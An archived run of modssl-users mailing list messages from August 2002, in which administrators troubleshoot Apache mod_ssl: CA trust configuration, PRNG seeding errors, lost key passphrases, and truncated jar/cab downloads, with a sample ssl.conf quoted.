Received: (qmail 16126 invoked by uid 500); 20 Aug 2002 04:03:35 -0000
Date: Tue, 20 Aug 2002 16:03:35 +1200
From: Jason Haar 
To: modssl-users@modssl.org
Subject: Re: SSL reverse proxy + Client Cert auth
Message-ID: <20020820040335.GC12385@trimble.co.nz>
References: <3D5CBA03.2080200@rdc.nl> <20020819064013.2248.qmail@web12707.mail.yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20020819064013.2248.qmail@web12707.mail.yahoo.com>
User-Agent: Mutt/1.3.99i
Organization: Trimble Navigation New Zealand Ltd.
X-Spam-Rating: pluto.trimble.co.nz 1.6.3-jlh 0/2001/A
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jason Haar 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Sun, Aug 18, 2002 at 11:40:13PM -0700, Anbuchezhian Chelliah wrote:
> Hi Danny,
>    I guess I understood your doubt. If not, please
> ignore this. There should be 'ca-bundle.crt' file in
> which you can put the third party's certificate and
> you could make a try.

Whoa! If you are running your own CA and only want your https server to
accept certs signed by that CA, then YOU MUST NOT USE THE ca-bundle.crt
FILE!!!

Replace it with your own cacert instead. Otherwise you are actually telling
your https server that *any* cert signed by *any* CA is valid - which may
not be what you want...

This is especially pertinent given the huge SSL hole found in IE/Konqueror
recently...

-- 
Cheers

Jason Haar
Information Security Manager, Trimble Navigation Ltd.
Phone: +64 3 9635 377 Fax: +64 3 9635 417
PGP Fingerprint: 7A2E 0407 C9A6 CAF6 2B9F 8422 C063 5EBB FE1D 66D1
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 20 10:11:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA03350; Tue, 20 Aug 2002 10:10:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from www.p2.experian.nl id KAA03338; Tue, 20 Aug 2002 10:09:45 +0200 (MET DST)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by www.p2.experian.nl (Postfix) with ESMTP id EBAC030008
	for ; Tue, 20 Aug 2002 10:09:44 +0200 (CEST)
Received: from shivaya.namah.om (unknown [10.200.3.17])
	by www.p2.experian.nl (Postfix) with SMTP id 7C9D830001
	for ; Tue, 20 Aug 2002 10:09:43 +0200 (CEST)
Date: Tue, 20 Aug 2002 09:13:41 +0200
From: Jeroen Vriesman 
To: modssl-users@modssl.org
Subject: still no message for old browsers
Message-Id: <20020820091341.6e51a012.jeroen@experian.nl>
Organization: Experian nederland b.v.
X-Mailer: Sylpheed version 0.7.5 (GTK+ 1.2.10; i586-mandrake-linux-gnu)
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: by Experian Advanced Mail Virusscanner
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeroen Vriesman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

thanks for the tips on how to create a situation where browsers which cannot handle 128 bits encryption are redirected to an upgrade message.

I get the idea of using the rewrite rules, but I'm still stuck.

I have a separate directory /var/www/messages configured with rewriteEngine off, aliased as /messages, but browsers without the 128 bits encryption capability don't seem to be able to access it, even if I allow all SSLCipherSuite.

Even if I get rid of the SSLRequire %{SSL_CIPHER_USEKEYSIZE} >= 128 completely, browsers without 128 bits encryption cannot access anything.

I do have a "global server certificate" from verisign, with an intermediate certificate installed with SSLCACertificateFile, could that have something to do with it?

Cheers,
Jeroen.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 20 16:09:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA10746; Tue, 20 Aug 2002 16:08:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mx0.gmx.net id QAA10739; Tue, 20 Aug 2002 16:07:44 +0200 (MET DST)
Received: (qmail 26768 invoked by uid 0); 20 Aug 2002 14:07:39 -0000
Date: Tue, 20 Aug 2002 16:07:38 +0200 (MEST)
From: mac leus 
To: modssl-users@modssl.org
MIME-Version: 1.0
Subject: Client certificate mapping in OpenLDAP
X-Priority: 3 (Normal)
X-Authenticated-Sender: #0015167436@gmx.net
X-Authenticated-IP: [193.173.47.36]
Message-ID: <28525.1029852458@www42.gmx.net>
X-Mailer: WWW-Mail 1.5 (Global Message Exchange)
X-Flags: 0001
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: mac leus 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello all,

I would like to know if anyone has experience with client certificate
mapping in LDAP. I know that there is a module called mod_authz, but I don't know
if it is any good. 

Thanks,

Leus

-- 
GMX - Die Kommunikationsplattform im Internet.
http://www.gmx.net

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 20 19:03:59 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA14572; Tue, 20 Aug 2002 19:02:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA14546; Tue, 20 Aug 2002 19:00:52 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 3BC324CE763; Tue, 20 Aug 2002 19:00:51 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 330CD286B6; Tue, 20 Aug 2002 18:25:32 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.staffs.ac.uk id RAA12333; Tue, 20 Aug 2002 17:17:57 +0200 (MET DST)
From: rmr1@staffs.ac.uk
Received: from rrogersnew (bsprmr.staffs.ac.uk [193.60.1.122])
	by mail.staffs.ac.uk (8.9.1/8.9.1) with ESMTP id QAA14548
	for ; Tue, 20 Aug 2002 16:17:56 +0100 (BST)
To: 
Subject: Problem starting Apache (yes I have read the FAQs!)
Date: Tue, 20 Aug 2002 16:17:44 +0100
Message-ID: <1342AFEFF7609A42AD20DB9E0BF20DBF01668B@crwnmail1.staff.staffs.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.3416
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rmr1@staffs.ac.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi all -

This seems to be a commonly reported problem, but for all the archives
and FAQs I've read, I am no further forward. Here is the situation: 

Apache 1.3.26, openSSL 0.9.6g, mod_ssl 2.8.10-1.3.26, Compaq Tru64 UNIX
4.0F.

On starting Apache, it immediately exits and logs the following in the
error log file:

[Tue Aug 20 15:50:13 2002] [error] mod_ssl: Init: Failed to generate
temporary 512 bit RSA private key (OpenSSL library error follows)
[Tue Aug 20 15:50:13 2002] [error] OpenSSL: error:24064064:random number
generator:SSLEAY_RAND_BYTES:PRNG not seeded
[Tue Aug 20 15:50:13 2002] [error] OpenSSL: error:04069003:rsa
routines:RSA_generate_key:BN lib

The FAQ refers to the SSLRandomSeed directive; this is set in the
httpd.conf file as

SSLRandomSeed startup builtin
SSLRandomSeed connect builtin

(As I'm running on Tru64 I don't have the option of using /dev/random)

It also refers to problems at the "make certificate" stage; that seems
to have gone through without any problems.

I've also read that there are problems with PHP, so I have removed all
reference in the httpd.conf file to the dynamic PHP module, and for good
measure the dynamic Apache Jserv module, so these are not loading. Still
no diference.

Can anyone offer me some more pointers?

Thanks

Richard

--

Richard Rogers
IT Services, Staffordshire University
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 20 21:39:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA19048; Tue, 20 Aug 2002 21:38:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id VAA19042; Tue, 20 Aug 2002 21:37:32 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id g7KJY5tQ005558
	for ; Tue, 20 Aug 2002 15:34:05 -0400
Date: Tue, 20 Aug 2002 15:34:05 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Problem starting Apache (yes I have read the FAQs!)
In-Reply-To: <1342AFEFF7609A42AD20DB9E0BF20DBF01668B@crwnmail1.staff.staffs.ac.uk>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 20 Aug 2002 rmr1@staffs.ac.uk wrote:

> The FAQ refers to the SSLRandomSeed directive; this is set in the
> httpd.conf file as
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> (As I'm running on Tru64 I don't have the option of using /dev/random)

Try using prngd ...

http://www.aet.tu-cottbus.de/personen/jaenicke/postfix_tls/prngd.html

Hope this helps,
Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 20 21:52:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA19288; Tue, 20 Aug 2002 21:51:31 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id VAA19280; Tue, 20 Aug 2002 21:50:18 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id H15R0S00.5PZ for ; Tue, 20 Aug 2002
          20:48:28 +0100 
Message-ID: <3D629D0A.7080905@itaction.co.uk>
Date: Tue, 20 Aug 2002 20:48:26 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Problem starting Apache (yes I have read the FAQs!)
References: <1342AFEFF7609A42AD20DB9E0BF20DBF01668B@crwnmail1.staff.staffs.ac.uk>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

there's more info on this in the reference manual, than the FAQ.

http://www.modssl.org/docs/2.8/ssl_reference.html#ToC4

Basically try changing the 'startup' one to use a 
file:/path/to/file/with/junk/in/it that points at a file with something 
random enough in it - I'm not mr crypto, but, by random I take it that 
something an outside party cant guess ought to be enough, and you need 
to experiment with file lengths a bit to find what works enough - some 
people advocate using the syslog output. Of course if you're just 
hacking around and you dont care that the NSA or the Home Office might 
be able to decrypt your ssl streams, then why stress out about it?

the 'connect' one however should get by using the builtin or see if you 
can get egd working - this one does affect performance, so avoid using 
the exec: option because spawning processes is not cheap on resources.

rmr1@staffs.ac.uk wrote:

>Hi all -
>
>This seems to be a commonly reported problem, but for all the archives
>and FAQs I've read, I am no further forward. Here is the situation: 
>
>Apache 1.3.26, openSSL 0.9.6g, mod_ssl 2.8.10-1.3.26, Compaq Tru64 UNIX
>4.0F.
>
>On starting Apache, it immediately exits and logs the following in the
>error log file:
>
>[Tue Aug 20 15:50:13 2002] [error] mod_ssl: Init: Failed to generate
>temporary 512 bit RSA private key (OpenSSL library error follows)
>[Tue Aug 20 15:50:13 2002] [error] OpenSSL: error:24064064:random number
>generator:SSLEAY_RAND_BYTES:PRNG not seeded
>[Tue Aug 20 15:50:13 2002] [error] OpenSSL: error:04069003:rsa
>routines:RSA_generate_key:BN lib
>
>The FAQ refers to the SSLRandomSeed directive; this is set in the
>httpd.conf file as
>
>SSLRandomSeed startup builtin
>SSLRandomSeed connect builtin
>
>(As I'm running on Tru64 I don't have the option of using /dev/random)
>
>It also refers to problems at the "make certificate" stage; that seems
>to have gone through without any problems.
>
>I've also read that there are problems with PHP, so I have removed all
>reference in the httpd.conf file to the dynamic PHP module, and for good
>measure the dynamic Apache Jserv module, so these are not loading. Still
>no diference.
>
>Can anyone offer me some more pointers?
>
>Thanks
>
>Richard
>
>--
>
>Richard Rogers
>IT Services, Staffordshire University
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 20 22:55:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA20764; Tue, 20 Aug 2002 22:54:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from it0033.it-action.com id WAA20758; Tue, 20 Aug 2002 22:53:30 +0200 (MET DST)
Received: from itaction.co.uk ([194.106.52.27]) by
          it0033.it-action.com (Netscape Messaging Server 4.15) with ESMTP
          id H15TZI00.SQE for ; Tue, 20 Aug 2002
          21:52:30 +0100 
Message-ID: <3D62AC0D.7030405@itaction.co.uk>
Date: Tue, 20 Aug 2002 21:52:29 +0100
From: "Peter Viertel" 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.0+) Gecko/20020430
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Resetting passphrase
References: <20020819110208.09068214.jeroen@experian.nl> 	<20020819132837.A11282937@ohm.arago.de> <1029775086.13843.15.camel@dhcp35.wellinx.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Peter Viertel" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

you have only one option - renew the certificate....

you have to pay up again, and submit a new csr based on a new key, but 
with identical certificate information.
not sure about verisign, but at least with thawte the renewal adds a 
year to the expiry date of the previous certificate, so at least you're 
not losing money on the deal, you're just renewing earlier than needed.


Ben Ricker wrote:

>I (stupidly) forgot what my passphrase is for a server cert I have
>created using OpenSSL. The cert is certified by verisign. Is there a way
>I can reset the passphrase WITHOUT recreating the cert?
>
>Ben Ricker
>Wellinx, Inc.
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 20 23:30:19 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id XAA21834; Tue, 20 Aug 2002 23:29:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtpzilla3.xs4all.nl id XAA21810; Tue, 20 Aug 2002 23:28:21 +0200 (MET DST)
Received: from a194-109-241-89.adsl.xs4all.nl (a194-109-241-89.adsl.xs4all.nl [194.109.241.89])
	by smtpzilla3.xs4all.nl (8.12.0/8.12.0) with SMTP id g7KLSFxG034879
	for ; Tue, 20 Aug 2002 23:28:21 +0200 (CEST)
Date: Tue, 20 Aug 2002 23:31:47 +0200
From: Jeroen Vriesman 
To: modssl-users@modssl.org
Subject: Re: Problem starting Apache (yes I have read the FAQs!)
Message-Id: <20020820233147.7b832b3b.jeroen@experian.nl>
In-Reply-To: <3D629D0A.7080905@itaction.co.uk>
References: <1342AFEFF7609A42AD20DB9E0BF20DBF01668B@crwnmail1.staff.staffs.ac.uk>
	<3D629D0A.7080905@itaction.co.uk>
Organization: Dynaserv
X-Mailer: Sylpheed version 0.7.8claws (GTK+ 1.2.10; )
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jeroen Vriesman 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, 20 Aug 2002 20:48:26 +0100
"Peter Viertel"  wrote:

> there's more info on this in the reference manual, than the FAQ.
> 
> http://www.modssl.org/docs/2.8/ssl_reference.html#ToC4
> 
> Basically try changing the 'startup' one to use a 
> file:/path/to/file/with/junk/in/it that points at a file with something 
> random enough in it - I'm not mr crypto, but, by random I take it that > something an outside party cant guess ought to be enough, and you need 
Actally something like "having an autocorrelation function which looks like a dirac delta function" is better.
Since an algorithm can never produce real random, there are actually "hardware random generators" using a source like zener noise for random.

Regards.
mr. (paranoid) crypto.



> to experiment with file lengths a bit to find what works enough - some 
> people advocate using the syslog output. Of course if you're just 
> hacking around and you dont care that the NSA or the Home Office might 
> be able to decrypt your ssl streams, then why stress out about it?
> 

I do care, they are always after me, realy!


> the 'connect' one however should get by using the builtin or see if you 
> can get egd working - this one does affect performance, so avoid using 
> the exec: option because spawning processes is not cheap on resources.
> 
> rmr1@staffs.ac.uk wrote:
> 
> >Hi all -
> >
> >This seems to be a commonly reported problem, but for all the archives
> >and FAQs I've read, I am no further forward. Here is the situation: 
> >
> >Apache 1.3.26, openSSL 0.9.6g, mod_ssl 2.8.10-1.3.26, Compaq Tru64 UNIX
> >4.0F.
> >
> >On starting Apache, it immediately exits and logs the following in the
> >error log file:
> >
> >[Tue Aug 20 15:50:13 2002] [error] mod_ssl: Init: Failed to generate
> >temporary 512 bit RSA private key (OpenSSL library error follows)
> >[Tue Aug 20 15:50:13 2002] [error] OpenSSL: error:24064064:random number
> >generator:SSLEAY_RAND_BYTES:PRNG not seeded
> >[Tue Aug 20 15:50:13 2002] [error] OpenSSL: error:04069003:rsa
> >routines:RSA_generate_key:BN lib
> >
> >The FAQ refers to the SSLRandomSeed directive; this is set in the
> >httpd.conf file as
> >
> >SSLRandomSeed startup builtin
> >SSLRandomSeed connect builtin
> >
> >(As I'm running on Tru64 I don't have the option of using /dev/random)
> >
> >It also refers to problems at the "make certificate" stage; that seems
> >to have gone through without any problems.
> >
> >I've also read that there are problems with PHP, so I have removed all
> >reference in the httpd.conf file to the dynamic PHP module, and for good
> >measure the dynamic Apache Jserv module, so these are not loading. Still
> >no diference.
> >
> >Can anyone offer me some more pointers?
> >
> >Thanks
> >
> >Richard
> >
> >--
> >
> >Richard Rogers
> >IT Services, Staffordshire University
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >  
> >
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 21 01:52:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id BAA25227; Wed, 21 Aug 2002 01:51:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id BAA25223; Wed, 21 Aug 2002 01:51:02 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Tue, 20 Aug 2002 16:49:57 -0700
Received: from 156.153.254.10 by lw11fd.law11.hotmail.msn.com with HTTP;
	Tue, 20 Aug 2002 23:49:56 GMT
X-Originating-IP: [156.153.254.10]
From: "Edward Wong" 
To: modssl-users@modssl.org
Subject: Corrupt Jar and Cab files
Date: Tue, 20 Aug 2002 16:49:56 -0700
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 20 Aug 2002 23:49:57.0039 (UTC) FILETIME=[49D5F3F0:01C248A4]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Edward Wong" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello All,

I'm seeing strange behavior when running apache 2.0.39 on Windows XP, where 
jar and cab files are truncated after after only 16K or so (my jar/cab files 
are actually around 100K).  This seems to happen with just about any 
browser, regardless of the JVM.  Also, this issue only occurs on Windows XP. 
  Win2k, WinNT, and Linux all work properly.

In Windows XP under http, everything seems to work just fine.  Under https, 
everything works fine EXCEPT for the jar and cab files.  Taking a look at 
the java cache shows that natually, the jar and cab files are missing.  My 
ssl conf files are as follows:

-------------------ssl.conf------------------------

#
# This is the Apache server configuration file providing SSL support.
# It contains the configuration directives to instruct the server how to
# serve pages over an https connection. For detailing information about 
these
# directives see 
#
#   For the moment, see  for this info.
#   The documents are still being prepared from material donated by the
#   modssl project.
#

#
# When we also provide SSL we have to listen to the
# standard HTTP port (see above) and to the HTTPS port
#

include conf/ssllisten.conf

##
##  SSL Global Context
##
##  All SSL configuration in this context applies both to
##  the main server and all SSL-enabled virtual hosts.
##

#
#   Some MIME-types for downloading Certificates and CRLs
#
AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl
AddType application/x-509-ca-cert  .csr

#   Pass Phrase Dialog:
#   Configure the pass phrase gathering process.
#   The filtering dialog program (`builtin' is a internal
#   terminal dialog) has to provide the pass phrase on stdout.
#SSLPassPhraseDialog  exec:certificates/getPassword.exe

#   Inter-Process Session Cache:
#   Configure the SSL Session Cache: First the mechanism
#   to use and second the expiring timeout (in seconds).
#SSLSessionCache        none
#SSLSessionCache        shmht:logs/ssl_scache(512000)
#SSLSessionCache        shmcb:logs/ssl_scache(512000)
SSLSessionCache         dbm:logs/ssl_scache
SSLSessionCacheTimeout  300

#   Semaphore:
#   Configure the path to the mutual exclusion semaphore the
#   SSL engine uses internally for inter-process synchronization.
SSLMutex  file:logs/ssl_mutex

#   Pseudo Random Number Generator (PRNG):
#   Configure one or more sources to seed the PRNG of the
#   SSL library. The seed data should be of good random quality.
#   WARNING! On some platforms /dev/random blocks if not enough entropy
#   is available. This means you then cannot use the /dev/random device
#   because it would lead to very long connection times (as long as
#   it requires to make more entropy available). But usually those
#   platforms additionally provide a /dev/urandom device which doesn't
#   block. So, if available, use this one instead. Read the mod_ssl User
#   Manual for more details.
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
#SSLRandomSeed startup file:/dev/random  512
#SSLRandomSeed startup file:/dev/urandom 512
#SSLRandomSeed connect file:/dev/random  512
#SSLRandomSeed connect file:/dev/urandom 512

#   Logging:
#   The home of the dedicated SSL protocol logfile. Errors are
#   additionally duplicated in the general error log file.  Put
#   this somewhere where it cannot be used for symlink attacks on
#   a real server (i.e. somewhere where only root can write).
#   Log levels are (ascending order: higher ones include lower ones):
#   none, error, warn, info, trace, debug.
#SSLLog      logs/ssl_engine_log
#SSLLogLevel warn


#   SSL Cipher Suite:
include conf/ciphers.conf

##
## SSL Virtual Host Context
##

include conf/sslvirtualhost.conf




--------and sslvirtualhost.conf--------




#DocumentRoot "doc"
#ServerAdmin you@your.address
ErrorLog logs/error_log
TransferLog logs/access_log
UseCanonicalName On

#   SSL Engine Switch:
#   Enable/Disable SSL for this virtual host.
SSLEngine on

#   Server Certificate:
#   Point SSLCertificateFile at a PEM encoded certificate.  If
#   the certificate is encrypted, then you will be prompted for a
#   pass phrase.  Note that a kill -HUP will prompt again. A test
#   certificate can be generated with `make certificate' under
#   built time. Keep in mind that if you've both a RSA and a DSA
#   certificate you can configure both in parallel (to also allow
#   the use of DSA ciphers, etc.)

SSLCertificateFile certificates/server.crt


#   Server Private Key:
#   If the key is not combined with the certificate, use this
#   directive to point at the key file.  Keep in mind that if
#   you've both a RSA and a DSA private key you can configure
#   both in parallel (to also allow the use of DSA ciphers, etc.)

SSLCertificateKeyFile certificates/server.key


#   Server Certificate Chain:
#   Point SSLCertificateChainFile at a file containing the
#   concatenation of PEM encoded CA certificates which form the
#   certificate chain for the server certificate. Alternatively
#   the referenced file can be the same as SSLCertificateFile
#   when the CA certificates are directly appended to the server
#   certificate for convinience.

#SSLCertificateChainFile certificates/server.crt


#   Certificate Authority (CA):
#   Set the CA certificate verification path where to find CA
#   certificates for client authentication or alternatively one
#   huge file containing all of them (file must be PEM encoded)
#   Note: Inside SSLCACertificatePath you need hash symlinks
#         to point to the certificate files. Use the provided
#         Makefile to update the hash symlinks after changes.
#SSLCACertificatePath /Apache2/conf/ssl.crt
#SSLCACertificateFile /Apache2/conf/ssl.crt/ca-bundle.crt

#   Certificate Revocation Lists (CRL):
#   Set the CA revocation path where to find CA CRLs for client
#   authentication or alternatively one huge file containing all
#   of them (file must be PEM encoded)
#   Note: Inside SSLCARevocationPath you need hash symlinks
#         to point to the certificate files. Use the provided
#         Makefile to update the hash symlinks after changes.
#SSLCARevocationPath /Apache2/conf/ssl.crl
#SSLCARevocationFile /Apache2/conf/ssl.crl/ca-bundle.crl

#   Client Authentication (Type):
#   Client certificate verification type and depth.  Types are
#   none, optional, require and optional_no_ca.  Depth is a
#   number which specifies how deeply to verify the certificate
#   issuer chain before deciding the certificate is not valid.
#SSLVerifyClient require
#SSLVerifyDepth  10

#   Access Control:
#   With SSLRequire you can do per-directory access control based
#   on arbitrary complex boolean expressions containing server
#   variable checks and other lookup directives.  The syntax is a
#   mixture between C and Perl.  See the mod_ssl documentation
#   for more details.
#
#SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
#            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
#            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
#            and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \
#            and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20       ) \
#           or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/
#

#   SSL Engine Options:
#   Set various options for the SSL engine.
#   o FakeBasicAuth:
#     Translate the client X.509 into a Basic Authorisation.  This means 
that
#     the standard Auth/DBMAuth methods can be used for access control.  The
#     user name is the `one line' version of the client's X.509 certificate.
#     Note that no password is obtained from the user. Every entry in the 
user
#     file needs this password: `xxj31ZMTZzkVA'.
#   o ExportCertData:
#     This exports two additional environment variables: SSL_CLIENT_CERT and
#     SSL_SERVER_CERT. These contain the PEM-encoded certificates of the
#     server (always existing) and the client (only existing when client
#     authentication is used). This can be used to import the certificates
#     into CGI scripts.
#   o StdEnvVars:
#     This exports the standard SSL/TLS related `SSL_*' environment 
variables.
#     Per default this exportation is switched off for performance reasons,
#     because the extraction step is an expensive operation and is usually
#     useless for serving static content. So one usually enables the
#     exportation for CGI and SSI requests only.
#   o CompatEnvVars:
#     This exports obsolete environment variables for backward compatibility
#     to Apache-SSL 1.x, mod_ssl 2.0.x, Sioux 1.0 and Stronghold 2.x. Use 
this
#     to provide compatibility to existing CGI scripts.
#   o StrictRequire:
#     This denies access when "SSLRequireSSL" or "SSLRequire" applied even
#     under a "Satisfy any" situation, i.e. when it applies access is denied
#     and no other module can change it.
#   o OptRenegotiate:
#     This enables optimized SSL connection renegotiation handling when SSL
#     directives are used in per-directory context.
SSLOptions +StdEnvVars +StrictRequire +OptRenegotiate

    SSLOptions +StdEnvVars



#   SSL Protocol Adjustments:
#   The safe and default but still SSL/TLS standard compliant shutdown
#   approach is that mod_ssl sends the close notify alert but doesn't wait 
for
#   the close notify alert from client. When you need a different shutdown
#   approach you can use one of the following variables:
#   o ssl-unclean-shutdown:
#     This forces an unclean shutdown when the connection is closed, i.e. no
#     SSL close notify alert is send or allowed to received.  This violates
#     the SSL/TLS standard but is needed for some brain-dead browsers. Use
#     this when you receive I/O errors because of the standard approach 
where
#     mod_ssl sends the close notify alert.
#   o ssl-accurate-shutdown:
#     This forces an accurate shutdown when the connection is closed, i.e. a
#     SSL close notify alert is send and mod_ssl waits for the close notify
#     alert of the client. This is 100% SSL/TLS standard compliant, but in
#     practice often causes hanging connections with brain-dead browsers. 
Use
#     this only for browsers where you know that their SSL implementation
#     works correctly.
#   Notice: Most problems of broken clients are also related to the HTTP
#   keep-alive facility, so you usually additionally want to disable
#   keep-alive for those clients, too. Use variable "nokeepalive" for this.
